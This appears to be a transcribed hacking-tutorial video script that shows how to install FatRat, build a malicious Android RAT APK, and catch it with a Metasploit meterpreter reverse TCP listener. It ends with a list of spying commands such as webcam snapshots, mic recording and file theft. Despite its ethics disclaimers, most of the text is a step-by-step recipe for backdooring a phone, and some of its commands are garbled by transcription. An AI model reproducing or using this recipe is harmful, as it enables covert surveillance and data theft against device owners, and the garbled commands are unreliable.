Disclaimer. Start this video is made only for educational purposes. Everything you see is performed in a controlled lab environment. Never try these tools on anyone's device or network without permission. Unauthorized hacking is illegal and punishable. Remember, knowledge is power, but power comes with responsibility. Intro hype. Welcome back to Blackstack. Today, we are going to dive into FatRat, one of the most famous hacking tools for generating backdoors and rat payloads. Think of it like an automated weapon for creating Trojans, backdoors, and testing how attackers compromise systems. But here, we'll use it only for learning and ethical hacking. Step 1. Setup. So, first, let's jump into our Kali Linux machine. Log in with username and password, all lowercase case sensitive. Now let's open a terminal. We start by updating our system, sudo apt update and sudo apt upgrade. This makes sure our system and packages are fresh. Step 2, installing FatRat. To install FatRat, we clone it from GitHub, git clone hdif github.com/screetsec the fatrat.git. Then move into the folder cd the FatRat. Now run the setup, chmodx setup.sh sudo/. Setup.sh FatRat will now download dependencies, compilers, and tools it needs to generate payloads. This can take a few minutes depending on your internet speed. Step 3. Running FatRat. After installation, start FatRat by typing sudo fatrat. Now the tool launches with its interactive menu. Here you'll see options like creating Trojans, backdoors, FUD payloads, and more. Step 4. Building an Android rat payload. Let's focus on Android for this demo. We choose the option for Android backdoor payload. Now FatRat asks us for lhost, your IP. In my case, I'll use 127.0.1 because I'm hacking my own machine. lport, the port number. Let's use 4444. FatRat now generates a malicious APK, basically our rat payload. This APK can be named anything, for example, blackstackrat.apk. Step 5, listening for victim device. Once payload is generated, we need to set up a listener to catch the connection. Open MSF console and type. Use exploit multi-set payload and Android meterpreter / reverse TCP set lhost 127.0.1 set lport 4444. Run. Now our listener is active. If the APK is installed on the test device, the session opens here. Step 6. Testing, ethical only. Right now, I don't have a test Android running, but in a real lab setup, once the victim installs the APK, the terminal shows a meterpreter session opened. From here, you can run commands like sysinfo, get device info, webcam snap, take a snapshot, record mic, record audio, download, steal files, shell, drop into device, shell. Again, these commands are shown for educational awareness only. Pros and cons. Useful for learning penetration testing. Great for understanding malware behavior. Dangerous in the wrong hands. Illegal without permission. Closing and motivation. So that was FatRat, a powerful backdoor and payload generator. Use this tool to learn, to defend, and to grow your cybersecurity skills. If you misuse it, you're not a hacker, you are just a criminal. But if you use it wisely, you can become a real cyber warrior. Outro. Thanks for watching Blackstack. If you want me to cover more tools like this, smash like, share, and subscribe. Stay ethical, stay sharp, and remember, power comes with responsibility. See you in the next one. Goodbye.